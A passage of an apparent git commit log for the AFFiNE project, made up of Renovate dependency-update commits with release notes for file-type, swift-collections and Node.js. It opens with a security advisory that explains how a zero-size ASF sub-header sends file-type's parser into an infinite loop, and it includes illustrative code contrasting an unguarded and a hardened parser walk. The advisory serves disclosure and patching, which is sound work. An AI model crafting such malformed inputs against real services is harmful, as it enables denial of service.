A denial of service vulnerability exists in the ASF (WMV/WMA) file type
detection parser. When parsing a crafted input where an ASF sub-header
has a `size` field of zero, the parser enters an infinite loop. The
`payload` value becomes negative (-24), causing
`tokenizer.ignore(payload)` to move the read position backwards, so the
same sub-header is read repeatedly forever.

Any application that uses `file-type` to detect the type of
untrusted/attacker-controlled input is affected. An attacker can stall
the Node.js event loop with a 55-byte payload.

### Patches
Fixed in version 21.3.1. Users should upgrade to >= 21.3.1.

### Workarounds
Validate or limit the size of input buffers before passing them to
`file-type`, or run file type detection in a worker thread with a
timeout.

### References
- Fix commit: 319abf871b50ba2fa221b4a7050059f1ae096f4f

### Reporter

crnkovic@lokvica.com

---

### Release Notes

<details>
<summary>sindresorhus/file-type (file-type)</summary>

###
[`v21.3.1`](https://redirect.github.com/sindresorhus/file-type/releases/tag/v21.3.1)

[Compare
Source](https://redirect.github.com/sindresorhus/file-type/compare/v21.3.0...v21.3.1)

- Fix infinite loop in ASF parser on malformed input
[`319abf8`](https://redirect.github.com/sindresorhus/file-type/commit/319abf8)

***

</details>

---

### Configuration

📅 **Schedule**: Branch creation - "" (UTC), Automerge - At any time (no
schedule defined).

🚦 **Automerge**: Disabled by config. Please merge this manually once you
are satisfied.

♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the
rebase/retry checkbox.

🔕 **Ignore**: Close this PR and you won't be reminded about this update
again.

---

- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check
this box

---

This PR was generated by [Mend Renovate](https://mend.io/renovate/).
View the [repository job
log](https://developer.mend.io/github/toeverything/AFFiNE).

Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
2026-03-11 13:58:31 +08:00
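
The ASF advisory quoted in the two file-type bumps above (21.3.1 and 21.3.2) comes down to one missing bounds check on a length field; the following JavaScript is an added illustration of that check and is not code from file-type or AFFiNE. `ToyTokenizer`, `walkUnguarded`, `walkHardened` and the sample bytes are hypothetical and constructed, and the 24-byte sub-header (16-byte GUID plus 64-bit little-endian size) is the assumed layout.

```javascript
// Added illustration: hypothetical walker, not file-type's source code.
// Assumed layout: each sub-header is a 16-byte GUID followed by a 64-bit
// little-endian size that includes the 24-byte header itself.
const HEADER_LENGTH = 24;

class ToyTokenizer {
	constructor(bytes) {
		this.view = new DataView(bytes.buffer, bytes.byteOffset, bytes.byteLength);
		this.position = 0;
	}

	get remaining() {
		return this.view.byteLength - this.position;
	}

	// Reads one sub-header and advances past it; undefined at end of input.
	readSubHeader() {
		if (this.remaining < HEADER_LENGTH) {
			return undefined;
		}

		const size = Number(this.view.getBigUint64(this.position + 16, true));
		this.position += HEADER_LENGTH;
		return {size};
	}

	// Applies the offset without checking its sign, so a negative length rewinds.
	ignore(length) {
		this.position += length;
	}
}

// Unguarded walk: trusts the size field. maximumSteps exists only so that this
// demonstration terminates; without it a zero size would never return.
function walkUnguarded(bytes, maximumSteps = 1000) {
	const tokenizer = new ToyTokenizer(bytes);
	let steps = 0;
	while (steps < maximumSteps) {
		const header = tokenizer.readSubHeader();
		if (!header) {
			return {status: 'done', steps};
		}

		steps++;
		const payload = header.size - HEADER_LENGTH; // -24 when size is 0
		tokenizer.ignore(payload);
	}

	return {status: 'step-limit', steps, position: tokenizer.position};
}

// Hardened walk: a size smaller than the header or larger than the remaining
// input is rejected, so every iteration moves forward by at least 24 bytes.
function walkHardened(bytes) {
	const tokenizer = new ToyTokenizer(bytes);
	let steps = 0;
	for (;;) {
		const offset = tokenizer.position;
		const header = tokenizer.readSubHeader();
		if (!header) {
			return {status: 'done', steps};
		}

		steps++;
		const payload = header.size - HEADER_LENGTH;
		if (!Number.isSafeInteger(header.size) || payload < 0 || payload > tokenizer.remaining) {
			return {status: 'malformed', steps, offset, size: header.size};
		}

		tokenizer.ignore(payload);
	}
}

// Constructed sample input: zeroed GUID, declared size, zero-filled payload.
function subHeader(declaredSize, payloadLength) {
	const bytes = new Uint8Array(HEADER_LENGTH + payloadLength);
	new DataView(bytes.buffer).setBigUint64(16, BigInt(declaredSize), true);
	return bytes;
}

function concatBytes(...parts) {
	const out = new Uint8Array(parts.reduce((sum, part) => sum + part.length, 0));
	let offset = 0;
	for (const part of parts) {
		out.set(part, offset);
		offset += part.length;
	}

	return out;
}

const WELL_FORMED = concatBytes(subHeader(32, 8), subHeader(24, 0));
const ZERO_SIZE = concatBytes(subHeader(32, 8), subHeader(0, 0));
```

On `ZERO_SIZE` the unguarded walk keeps returning to offset 32 until the step cap stops it, while the hardened walk reports the malformed sub-header on its second step.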
DarkSky 29a27b561b feat(server): migrate copilot to native (#14620)
#### PR Dependency Tree


* **PR #14620** 👈

This tree was auto-generated by
[Charcoal](https://github.com/danerwilliams/charcoal)

<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->
## Summary by CodeRabbit

* **New Features**
* Native LLM workflows: structured outputs, embeddings, and reranking
plus richer multimodal attachments (images, audio, files) and improved
remote-attachment inlining.

* **Refactor**
* Tooling API unified behind a local tool-definition helper;
provider/adapters reorganized to route through native dispatch paths.

* **Chores**
* Dependency updates, removed legacy Google SDK integrations, and
increased front memory allocation.

* **Tests**
* Expanded end-to-end and streaming tests exercising native provider
flows, attachments, and rerank/structured scenarios.
<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-03-11 13:55:35 +08:00
renovate[bot] 02744cec00 chore: bump up apple/swift-collections version to from: "1.4.0" (#14616)
This PR contains the following updates:

| Package | Update | Change |
|---|---|---|
| [apple/swift-collections](https://redirect.github.com/apple/swift-collections) | minor | `from: "1.3.0"` → `from: "1.4.0"` |

---

### Release Notes

<details>
<summary>apple/swift-collections (apple/swift-collections)</summary>

###
[`v1.4.0`](https://redirect.github.com/apple/swift-collections/releases/tag/1.4.0):
Swift Collections 1.4.0

[Compare
Source](https://redirect.github.com/apple/swift-collections/compare/1.3.0...1.4.0)

This feature release supports Swift toolchain versions 6.0, 6.1 and 6.2.
It includes a variety of bug fixes, and ships the following new
features:

##### New ownership-aware ring buffer and hashed container
implementations

In the `DequeModule` module, we have two new source-stable types that
provide ownership-aware ring buffer implementations:

- [`struct UniqueDeque<Element>`][UniqueDeque] is a uniquely held,
dynamically resizing, noncopyable deque.
- [`struct RigidDeque<Element>`][RigidDeque] is a fixed-capacity deque
implementation.

`RigidDeque`/`UniqueDeque` are to `Deque` like
`RigidArray`/`UniqueArray` are to `Array` -- they provide noncopyable
embodiments of the same basic data structure, with many of the same
operations.

[UniqueDeque]:
https://swiftpackageindex.com/apple/swift-collections/documentation/dequemodule/uniquedeque

[RigidDeque]:
https://swiftpackageindex.com/apple/swift-collections/documentation/dequemodule/rigiddeque

In the `BasicContainers` module, this release adds previews of four new
types, implementing ownership-aware hashed containers:

- [`struct UniqueSet<Element>`][UniqueSet] is a uniquely held,
dynamically resizing set.
- [`struct RigidSet<Element>`][RigidSet] is a fixed-capacity set.
- [`struct UniqueDictionary<Key, Value>`][UniqueDictionary] is a
uniquely held, dynamically resizing dictionary.
- [`struct RigidDictionary<Key, Value>`][RigidDictionary] is a
fixed-capacity dictionary.

[RigidSet]:
https://redirect.github.com/apple/swift-collections/tree/main/Sources/BasicContainers/RigidSet

[UniqueSet]:
https://redirect.github.com/apple/swift-collections/tree/main/Sources/BasicContainers/UniqueSet

[RigidDictionary]:
https://redirect.github.com/apple/swift-collections/tree/main/Sources/BasicContainers/RigidDictionary

[UniqueDictionary]:
https://redirect.github.com/apple/swift-collections/tree/main/Sources/BasicContainers/UniqueDictionary

These are direct analogues of the standard `Set` and `Dictionary` types.
These types are built on top of the `Equatable` and `Hashable` protocol
generalizations that were proposed in [SE-0499]; as that proposal is not
yet implemented in any shipping toolchain, these new types are shipping
as source-unstable previews, conditional on a new
`UnstableHashedContainers` package trait. The final API of these types
will also deeply depend on the `struct Borrow` and `struct Inout`
proposals (and potentially other language/stdlib improvements) that are
currently working their way through the Swift Evolution process.
Accordingly, we may need to make source-breaking changes to the
interfaces of these types -- they are not ready to be blessed as Public
API. However, we encourage intrepid engineers to try them on for size,
and report pain points. (Of which we expect there will be many in this
first preview.)

[SE-0499]:
https://redirect.github.com/swiftlang/swift-evolution/blob/main/proposals/0499-support-non-copyable-simple-protocols.md

We continue the pattern of `Rigid-` and `Unique-` naming prefixes with
these new types:

- The `Unique` types (`UniqueArray`, `UniqueDeque`, `UniqueSet`,
`UniqueDictionary` etc.) are dynamically self-sizing containers that
automatically reallocate their storage as needed to best accommodate
their contents; the `Unique` prefix was chosen to highlight that these
types are always uniquely held, avoiding the complications of mutating
shared copies.
- The `Rigid` types remove dynamic sizing, and they operate strictly
within an explicitly configured capacity. Dynamic sizing is not always
appropriate -- when targeting space- or time-constrained environments
(think embedded use cases or real-time work), it is preferable to avoid
implicit reallocations, and to instead choose to have explicit control
over when (and if) storage is reallocated, and to what size. This is
where the `Rigid` types come in: their instances are created with a
specific capacity and it is a runtime error to exceed that. This makes
them quite inflexible (hence the "rigid" qualifier), but in exchange,
their operations provide far stricter complexity guarantees: they
exhibit no random runtime latency spikes, and they can trivially fit in
strict memory budgets.

##### Early drafts of borrowing sequence, generative iteration and
container protocols

This release includes highly experimental but *working* implementations
of new protocols supplying ownership-aware alternatives to the classic
`Sequence`/`Collection` protocol hierarchy. These protocols and the
generic operations built on top of them can be turned on by enabling the
`UnstableContainersPreview` package trait.

- [`protocol BorrowingSequence<Element>`][BorrowingSequence] models
borrowing sequences with ephemeral lifetimes. (This is already
progressing through Swift Evolution.)
- [`protocol Container<Element>`][Container] models constructs that
physically store their contents, and can expose stable spans over them.
- [`protocol Producer<Element, ProducerError>`][Producer] models a
generative iterator -- a construct that generates items on demand.
- [`protocol Drain<Element>`][Drain] refines `Producer` to model
in-place consumable elements -- primarily for use around container
types.

[BorrowingSequence]:
https://redirect.github.com/apple/swift-collections/blob/main/Sources/ContainersPreview/Protocols/BorrowingSequence.swift

[BorrowingIteratorProtocol]:
https://redirect.github.com/apple/swift-collections/blob/main/Sources/ContainersPreview/Protocols/BorrowingIteratorProtocol.swift

[Container]:
https://redirect.github.com/apple/swift-collections/blob/main/Sources/ContainersPreview/Protocols/Container.swift

[Producer]:
https://redirect.github.com/apple/swift-collections/blob/main/Sources/ContainersPreview/Protocols/Producer.swift

[Drain]:
https://redirect.github.com/apple/swift-collections/blob/main/Sources/ContainersPreview/Protocols/Drain.swift

In this version, the package has developed these protocols just enough
to implement basic generic operations for moving data between containers
like `UniqueArray` and `RigidDeque`. As we gain experience using these,
future releases may start adding basic generic algorithms, more
protocols (bidirectional, random-access, (per)mutable, range-replaceable
containers etc.) convenience adapters, and other features -- or we may
end up entirely overhauling or simply discarding some/all of them.
Accordingly, the experimental interfaces enabled by
`UnstableContainersPreview` are not source stable, and they are not
intended for production use. We expect the eventual production version
of these (or whatever designs they evolve into) to ship in the Swift
Standard Library. We do highly recommend interested folks to try playing
with these, to get a feel for the strange problems of Ownership.

Besides these protocols, the package also defines rudimentary
substitutes of some basic primitives that belong in the Standard
Library:

- [`struct InputSpan<Element>`][InputSpan] the dual of `OutputSpan` --
while `OutputSpan` is primarily for moving items *into* somebody else's
storage, `InputSpan` enables safely moving items *out of* storage.
- [`struct Borrow<Target>`][Borrow] represents a borrowing reference to
an item. (This package models this with a pointer, which is an
ill-fitting substitute for the real implementation in the stdlib.)
- [`struct Inout<Target>`][Inout] represents a mutating reference to an
item.

[InputSpan]:
https://redirect.github.com/apple/swift-collections/blob/main/Sources/ContainersPreview/Types/InputSpan.swift

[Borrow]:
https://redirect.github.com/apple/swift-collections/blob/main/Sources/ContainersPreview/Types/Borrow.swift

[Inout]:
https://redirect.github.com/apple/swift-collections/blob/main/Sources/ContainersPreview/Types/Inout.swift

##### A formal way to access `SortedSet` and `SortedDictionary` types

The `SortedCollections` module contains (preexisting) early drafts of
two sorted collection types `SortedSet` and `SortedDictionary`, built on
top of an in-memory B-tree implementation. This release defines an
`UnstableSortedCollections` package trait that can be used to enable
building these types for experimentation without manually modifying the
package. Like in previous releases, these implementations remain
unfinished in this release, with known API issues; accordingly, these
types remain unstable. (Issue
[#1](https://redirect.github.com/apple/swift-collections/issues/1)
remains open.) Future package releases may change their interface in
ways that break source compatibility, or they may remove these types
altogether.

##### Minor interface-level changes

- The `Collections` module no longer uses the unstable `@_exported
import` feature. Instead, it publishes public typealiases of every type
that it previously reexported from `DequeModule`, `OrderedCollections`,
`BitCollections`, `HeapModule` and `HashTreeCollections`.

- We renamed some `RigidArray`/`UniqueArray` operations to improve their
clarity at the point of use. The old names are still available, but
deprecated.

| Old name | New name |
| ----------------------------------------------- | ------------------------------------------------- |
| `append(count:initializingWith:)` | `append(addingCount:initializingWith:)` |
| `insert(count:at:initializingWith:)` | `insert(addingCount:at:initializingWith:)` |
| `replaceSubrange(_:newCount:initializingWith:)` | `replace(removing:addingCount:initializingWith:)` |
| `replaceSubrange(_:moving:)` | `replace(removing:moving:)` |
| `replaceSubrange(_:copying:)` | `replace(removing:copying:)` |
| `copy()` | `clone()` |
| `copy(capacity:)` | `clone(capacity:)` |

- We have now defined a complete set of `OutputSpan`/`InputSpan`-based
`append`/`insert`/`replace`/`consume` primitives, fully generalized to
be implementable by piecewise contiguous containers. These operations
pave the way for a `Container`-based analogue of the classic
`RangeReplaceableCollection` protocol, with most of the user-facing
operations becoming standard generic algorithms built on top of these
primitives:

  ```
  mutating func append<E: Error>(
      addingCount newItemCount: Int,
      initializingWith initializer: (inout OutputSpan<Element>) throws(E) -> Void
  )

  mutating func insert<E: Error>(
      addingCount newItemCount: Int,
      at index: Int,
      initializingWith initializer: (inout OutputSpan<Element>) throws(E) -> Void
  ) throws(E)

  mutating func replace<E: Error>(
      removing subrange: Range<Int>,
      consumingWith consumer: (inout InputSpan<Element>) -> Void,
      addingCount newItemCount: Int,
      initializingWith initializer: (inout OutputSpan<Element>) throws(E) -> Void
  ) throws(E)

  mutating func consume(
      _ subrange: Range<Int>,
      consumingWith consumer: (inout InputSpan<Element>) -> Void
  )
  ```

- The package no longer uses the code generation tool `gyb`.

#### What's Changed

- Fix links in GitHub templates by
[@&#8203;lorentey](https://redirect.github.com/lorentey) in
[#&#8203;527](https://redirect.github.com/apple/swift-collections/pull/527)
- Adopt `package` access modifier and get rid of gybbing by
[@&#8203;lorentey](https://redirect.github.com/lorentey) in
[#&#8203;526](https://redirect.github.com/apple/swift-collections/pull/526)
- \[Doc] Fix links in landing page by
[@&#8203;Azoy](https://redirect.github.com/Azoy) in
[#&#8203;531](https://redirect.github.com/apple/swift-collections/pull/531)
- \[BigString] Refactor \_Chunk to be its own managed buffer of UTF8 by
[@&#8203;Azoy](https://redirect.github.com/Azoy) in
[#&#8203;488](https://redirect.github.com/apple/swift-collections/pull/488)
- Add new package trait UnstableSortedCollections by
[@&#8203;lorentey](https://redirect.github.com/lorentey) in
[#&#8203;533](https://redirect.github.com/apple/swift-collections/pull/533)
- \[RopeModule] Fix warnings by
[@&#8203;lorentey](https://redirect.github.com/lorentey) in
[#&#8203;534](https://redirect.github.com/apple/swift-collections/pull/534)
- Fix ability to build & test BigString with Xcode & CMake by
[@&#8203;lorentey](https://redirect.github.com/lorentey) in
[#&#8203;537](https://redirect.github.com/apple/swift-collections/pull/537)
- \[BigString] Bring back Index.\_isUTF16TrailingSurrogate by
[@&#8203;Azoy](https://redirect.github.com/Azoy) in
[#&#8203;539](https://redirect.github.com/apple/swift-collections/pull/539)
- chore: restrict GitHub workflow permissions - future-proof by
[@&#8203;incertum](https://redirect.github.com/incertum) in
[#&#8203;540](https://redirect.github.com/apple/swift-collections/pull/540)
- \[BitCollections] Add missing imports for InternalCollectionsUtilities
by [@&#8203;lorentey](https://redirect.github.com/lorentey) in
[#&#8203;554](https://redirect.github.com/apple/swift-collections/pull/554)
- Compare self.value to other, not itself by
[@&#8203;SiliconA-Z](https://redirect.github.com/SiliconA-Z) in
[#&#8203;553](https://redirect.github.com/apple/swift-collections/pull/553)
- Change useFloyd heuristic to match comment by
[@&#8203;SiliconA-Z](https://redirect.github.com/SiliconA-Z) in
[#&#8203;551](https://redirect.github.com/apple/swift-collections/pull/551)
- Typo: symmetric difference should be the xor, not intersection by
[@&#8203;SiliconA-Z](https://redirect.github.com/SiliconA-Z) in
[#&#8203;550](https://redirect.github.com/apple/swift-collections/pull/550)
- first should get the Initialized elements by
[@&#8203;SiliconA-Z](https://redirect.github.com/SiliconA-Z) in
[#&#8203;549](https://redirect.github.com/apple/swift-collections/pull/549)
- Replace Container with a far less powerful (but more universal)
Iterable construct by
[@&#8203;lorentey](https://redirect.github.com/lorentey) in
[#&#8203;543](https://redirect.github.com/apple/swift-collections/pull/543)
- Temporarily stop testing RigidArray & UniqueArray on release/6.3
snapshots on Linux by
[@&#8203;lorentey](https://redirect.github.com/lorentey) in
[#&#8203;562](https://redirect.github.com/apple/swift-collections/pull/562)
- \[RigidArray, HashTrees] Mark deinitializers inlinable by
[@&#8203;lorentey](https://redirect.github.com/lorentey) in
[#&#8203;560](https://redirect.github.com/apple/swift-collections/pull/560)
- GHA: Add weekly dependabot by
[@&#8203;bkhouri](https://redirect.github.com/bkhouri) in
[#&#8203;563](https://redirect.github.com/apple/swift-collections/pull/563)
- Work around temporary issue with current 6.3 snapshots by
[@&#8203;lorentey](https://redirect.github.com/lorentey) in
[#&#8203;565](https://redirect.github.com/apple/swift-collections/pull/565)
- Add `RigidDeque` and `UniqueDeque` by
[@&#8203;lorentey](https://redirect.github.com/lorentey) in
[#&#8203;557](https://redirect.github.com/apple/swift-collections/pull/557)
- \[Collections module] Stop using `@_exported import` by
[@&#8203;lorentey](https://redirect.github.com/lorentey) in
[#&#8203;566](https://redirect.github.com/apple/swift-collections/pull/566)
- Delete stray benchmark results files by
[@&#8203;lorentey](https://redirect.github.com/lorentey) in
[#&#8203;567](https://redirect.github.com/apple/swift-collections/pull/567)
- Assorted `RigidArray`/`UniqueArray` updates by
[@&#8203;lorentey](https://redirect.github.com/lorentey) in
[#&#8203;569](https://redirect.github.com/apple/swift-collections/pull/569)
- `RigidArray`/`UniqueArray`: Add new copying span initializers by
[@&#8203;Azoy](https://redirect.github.com/Azoy) in
[#&#8203;572](https://redirect.github.com/apple/swift-collections/pull/572)
- `RigidDeque`/`UniqueDeque`: Add some top-level documentation by
[@&#8203;lorentey](https://redirect.github.com/lorentey) in
[#&#8203;571](https://redirect.github.com/apple/swift-collections/pull/571)
- Update docs for Container.nextSpan(after:maximumCount:) by
[@&#8203;lorentey](https://redirect.github.com/lorentey) in
[#&#8203;574](https://redirect.github.com/apple/swift-collections/pull/574)
- Remove workaround for bug in OutputSpan.wUMBP by
[@&#8203;lorentey](https://redirect.github.com/lorentey) in
[#&#8203;570](https://redirect.github.com/apple/swift-collections/pull/570)
- \[RigidArray, RigidDeque].nextSpan: Validate `maximumCount` by
[@&#8203;lorentey](https://redirect.github.com/lorentey) in
[#&#8203;575](https://redirect.github.com/apple/swift-collections/pull/575)
- Bump swiftlang/github-workflows/.github/workflows/soundness.yml from
0.0.6 to 0.0.7 by
[@&#8203;dependabot](https://redirect.github.com/dependabot)\[bot] in
[#&#8203;577](https://redirect.github.com/apple/swift-collections/pull/577)
- give constant folding an opportunity to select a much faster code path
for empty dictionary (and set) literals by
[@&#8203;tayloraswift](https://redirect.github.com/tayloraswift) in
[#&#8203;578](https://redirect.github.com/apple/swift-collections/pull/578)
- Bump
swiftlang/github-workflows/.github/workflows/swift\_package\_test.yml
from 0.0.6 to 0.0.7 by
[@&#8203;dependabot](https://redirect.github.com/dependabot)\[bot] in
[#&#8203;576](https://redirect.github.com/apple/swift-collections/pull/576)
- Ownership-aware Set and Dictionary variants by
[@&#8203;lorentey](https://redirect.github.com/lorentey) in
[#&#8203;573](https://redirect.github.com/apple/swift-collections/pull/573)
- \[Prerelease] Check API for consistency, fill holes, patch
incoherencies by
[@&#8203;lorentey](https://redirect.github.com/lorentey) in
[#&#8203;581](https://redirect.github.com/apple/swift-collections/pull/581)
- \[BitSet] Amend return value of `update(with:)` method by
[@&#8203;benrimmington](https://redirect.github.com/benrimmington) in
[#&#8203;538](https://redirect.github.com/apple/swift-collections/pull/538)
- \[BasicContainers] Fix spelling of a source file by
[@&#8203;lorentey](https://redirect.github.com/lorentey) in
[#&#8203;585](https://redirect.github.com/apple/swift-collections/pull/585)
- Include notes about index mutation in `span(after/before:)` (+ other
doc fixes) by
[@&#8203;natecook1000](https://redirect.github.com/natecook1000) in
[#&#8203;541](https://redirect.github.com/apple/swift-collections/pull/541)
- \[BasicContainers] Finalize requirements for hashed containers by
[@&#8203;lorentey](https://redirect.github.com/lorentey) in
[#&#8203;586](https://redirect.github.com/apple/swift-collections/pull/586)
- Update README for 1.4.0 by
[@&#8203;lorentey](https://redirect.github.com/lorentey) in
[#&#8203;587](https://redirect.github.com/apple/swift-collections/pull/587)
- Working towards the 1.4.0 tag by
[@&#8203;lorentey](https://redirect.github.com/lorentey) in
[#&#8203;588](https://redirect.github.com/apple/swift-collections/pull/588)
- \[BasicContainers] Avoid defining set/dictionary types unless
UnstableHashedContainers is enabled by
[@&#8203;lorentey](https://redirect.github.com/lorentey) in
[#&#8203;589](https://redirect.github.com/apple/swift-collections/pull/589)
- \[BasicContainers] RigidArray: Correct spelling of replacement for
deprecated method by
[@&#8203;lorentey](https://redirect.github.com/lorentey) in
[#&#8203;590](https://redirect.github.com/apple/swift-collections/pull/590)

#### New Contributors

- [@incertum](https://redirect.github.com/incertum) made their
first contribution in
[#540](https://redirect.github.com/apple/swift-collections/pull/540)
- [@SiliconA-Z](https://redirect.github.com/SiliconA-Z) made
their first contribution in
[#553](https://redirect.github.com/apple/swift-collections/pull/553)
- [@bkhouri](https://redirect.github.com/bkhouri) made their
first contribution in
[#563](https://redirect.github.com/apple/swift-collections/pull/563)
- [@dependabot](https://redirect.github.com/dependabot)\[bot]
made their first contribution in
[#577](https://redirect.github.com/apple/swift-collections/pull/577)
- [@tayloraswift](https://redirect.github.com/tayloraswift) made
their first contribution in
[#578](https://redirect.github.com/apple/swift-collections/pull/578)
- [@benrimmington](https://redirect.github.com/benrimmington)
made their first contribution in
[#538](https://redirect.github.com/apple/swift-collections/pull/538)

**Full Changelog**:
<https://github.com/apple/swift-collections/compare/1.3.0...1.4.0>

</details>

---

### Configuration

📅 **Schedule**: Branch creation - At any time (no schedule defined),
Automerge - At any time (no schedule defined).

🚦 **Automerge**: Disabled by config. Please merge this manually once you
are satisfied.

♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the
rebase/retry checkbox.

🔕 **Ignore**: Close this PR and you won't be reminded about this update
again.

---

- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check
this box

---

This PR was generated by [Mend Renovate](https://mend.io/renovate/).
View the [repository job
log](https://developer.mend.io/github/toeverything/AFFiNE).

Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
2026-03-09 12:31:54 +00:00
renovate[bot] 6d710f3bdc chore: bump up Node.js to v22.22.1 (#14598)
> ℹ️ **Note**
> 
> This PR body was truncated due to platform limits.

This PR contains the following updates:

| Package | Update | Change |
|---|---|---|
| [node](https://nodejs.org)
([source](https://redirect.github.com/nodejs/node)) | patch | `22.22.0`
→ `22.22.1` |

---

### Release Notes

<details>
<summary>nodejs/node (node)</summary>

###
[`v22.22.1`](https://redirect.github.com/nodejs/node/releases/tag/v22.22.1):
2026-03-05, Version 22.22.1 'Jod' (LTS)

[Compare
Source](https://redirect.github.com/nodejs/node/compare/v22.22.0...v22.22.1)

##### Notable Changes

-
\[[`7b93a65f27`](https://redirect.github.com/nodejs/node/commit/7b93a65f27)]
- **build**: test on Python 3.14 (Christian Clauss)
[#&#8203;59983](https://redirect.github.com/nodejs/node/pull/59983)
-
\[[`6063d888fe`](https://redirect.github.com/nodejs/node/commit/6063d888fe)]
- **cli**: mark `--heapsnapshot-near-heap-limit` as stable (Joyee
Cheung)
[#&#8203;60956](https://redirect.github.com/nodejs/node/pull/60956)
-
\[[`d950b151a2`](https://redirect.github.com/nodejs/node/commit/d950b151a2)]
- **crypto**: update root certificates to NSS 3.119 (Node.js GitHub Bot)
[#&#8203;61419](https://redirect.github.com/nodejs/node/pull/61419)
-
\[[`4f42f8c428`](https://redirect.github.com/nodejs/node/commit/4f42f8c428)]
- **crypto**: update root certificates to NSS 3.117 (Node.js GitHub Bot)
[#&#8203;60741](https://redirect.github.com/nodejs/node/pull/60741)
-
\[[`b6ebf2cd53`](https://redirect.github.com/nodejs/node/commit/b6ebf2cd53)]
- **doc**: add avivkeller to collaborators (Aviv Keller)
[#&#8203;61115](https://redirect.github.com/nodejs/node/pull/61115)
-
\[[`35854f424d`](https://redirect.github.com/nodejs/node/commit/35854f424d)]
- **doc**: add gurgunday to collaborators (Gürgün Dayıoğlu)
[#&#8203;61094](https://redirect.github.com/nodejs/node/pull/61094)
-
\[[`5c6a076e5d`](https://redirect.github.com/nodejs/node/commit/5c6a076e5d)]
- **meta**: add Renegade334 to collaborators (Renegade334)
[#&#8203;60714](https://redirect.github.com/nodejs/node/pull/60714)

##### Commits

-
\[[`5f773488c2`](https://redirect.github.com/nodejs/node/commit/5f773488c2)]
- **assert**: use a set instead of an array for faster lookup (Ruben
Bridgewater)
[#&#8203;61076](https://redirect.github.com/nodejs/node/pull/61076)
-
\[[`feecbb0eab`](https://redirect.github.com/nodejs/node/commit/feecbb0eab)]
- **assert,util**: fix deep comparison for sets and maps with mixed
types (Ruben Bridgewater)
[#&#8203;61388](https://redirect.github.com/nodejs/node/pull/61388)
-
\[[`096095b127`](https://redirect.github.com/nodejs/node/commit/096095b127)]
- **benchmark**: add SQLite benchmarks (Guilherme Araújo)
[#&#8203;61401](https://redirect.github.com/nodejs/node/pull/61401)
-
\[[`b5fe481415`](https://redirect.github.com/nodejs/node/commit/b5fe481415)]
- **benchmark**: use boolean options in benchmark tests (SeokhunEom)
[#&#8203;60129](https://redirect.github.com/nodejs/node/pull/60129)
-
\[[`fa9faacacb`](https://redirect.github.com/nodejs/node/commit/fa9faacacb)]
- **benchmark**: allow boolean option values (SeokhunEom)
[#&#8203;60129](https://redirect.github.com/nodejs/node/pull/60129)
-
\[[`ba8714ac21`](https://redirect.github.com/nodejs/node/commit/ba8714ac21)]
- **benchmark**: fix incorrect base64 input in byteLength benchmark
(semimikoh)
[#&#8203;60841](https://redirect.github.com/nodejs/node/pull/60841)
-
\[[`53596de876`](https://redirect.github.com/nodejs/node/commit/53596de876)]
- **benchmark**: use typescript for import cjs benchmark (Joyee Cheung)
[#&#8203;60663](https://redirect.github.com/nodejs/node/pull/60663)
-
\[[`e8930e9d7c`](https://redirect.github.com/nodejs/node/commit/e8930e9d7c)]
- **benchmark**: focus on import.meta intialization in import-meta
benchmark (Joyee Cheung)
[#&#8203;60603](https://redirect.github.com/nodejs/node/pull/60603)
-
\[[`1155e412b1`](https://redirect.github.com/nodejs/node/commit/1155e412b1)]
- **benchmark**: add per-suite setup option (Joyee Cheung)
[#&#8203;60574](https://redirect.github.com/nodejs/node/pull/60574)
-
\[[`e01903d304`](https://redirect.github.com/nodejs/node/commit/e01903d304)]
- **benchmark**: improve cpu.sh for safety and usability (Nam Yooseong)
[#&#8203;60162](https://redirect.github.com/nodejs/node/pull/60162)
-
\[[`623a405747`](https://redirect.github.com/nodejs/node/commit/623a405747)]
- **benchmark**: add benchmark for leaf source text modules (Joyee
Cheung)
[#&#8203;60205](https://redirect.github.com/nodejs/node/pull/60205)
-
\[[`7f5e7b9f7f`](https://redirect.github.com/nodejs/node/commit/7f5e7b9f7f)]
- **benchmark**: add microbench on isInsideNodeModules (Chengzhong Wu)
[#&#8203;60991](https://redirect.github.com/nodejs/node/pull/60991)
-
\[[`db132b85a8`](https://redirect.github.com/nodejs/node/commit/db132b85a8)]
- **bootstrap**: initialize http proxy after user module loader setup
(Joyee Cheung)
[#&#8203;58938](https://redirect.github.com/nodejs/node/pull/58938)
-
\[[`66aab9f987`](https://redirect.github.com/nodejs/node/commit/66aab9f987)]
- **buffer**: let Buffer.of use heap (Сковорода Никита Андреевич)
[#&#8203;60503](https://redirect.github.com/nodejs/node/pull/60503)
-
\[[`c3cf00c671`](https://redirect.github.com/nodejs/node/commit/c3cf00c671)]
- **buffer**: speed up concat via TypedArray#set (Gürgün Dayıoğlu)
[#&#8203;60399](https://redirect.github.com/nodejs/node/pull/60399)
-
\[[`f6fad231e9`](https://redirect.github.com/nodejs/node/commit/f6fad231e9)]
- **build**: skip sscache action on non-main branches (Joyee Cheung)
[#&#8203;61790](https://redirect.github.com/nodejs/node/pull/61790)
-
\[[`2145f91f6b`](https://redirect.github.com/nodejs/node/commit/2145f91f6b)]
- **build**: update android-patches/trap-handler.h.patch (Mo Luo)
[#&#8203;60369](https://redirect.github.com/nodejs/node/pull/60369)
-
\[[`5b49759dd8`](https://redirect.github.com/nodejs/node/commit/5b49759dd8)]
- **build**: update devcontainer.json to use paired nix env (Joyee
Cheung)
[#&#8203;61414](https://redirect.github.com/nodejs/node/pull/61414)
-
\[[`24724cde40`](https://redirect.github.com/nodejs/node/commit/24724cde40)]
- **build**: fix misplaced comma in ldflags (hqzing)
[#&#8203;61294](https://redirect.github.com/nodejs/node/pull/61294)
-
\[[`c57a19934e`](https://redirect.github.com/nodejs/node/commit/c57a19934e)]
- **build**: fix crate vendor file checksums on windows (Chengzhong Wu)
[#&#8203;61329](https://redirect.github.com/nodejs/node/pull/61329)
-
\[[`8659d7cd07`](https://redirect.github.com/nodejs/node/commit/8659d7cd07)]
- **build**: fix inconsistent quoting in `Makefile` (Antoine du Hamel)
[#&#8203;60511](https://redirect.github.com/nodejs/node/pull/60511)
-
\[[`44f339b315`](https://redirect.github.com/nodejs/node/commit/44f339b315)]
- **build**: remove temporal updater (Chengzhong Wu)
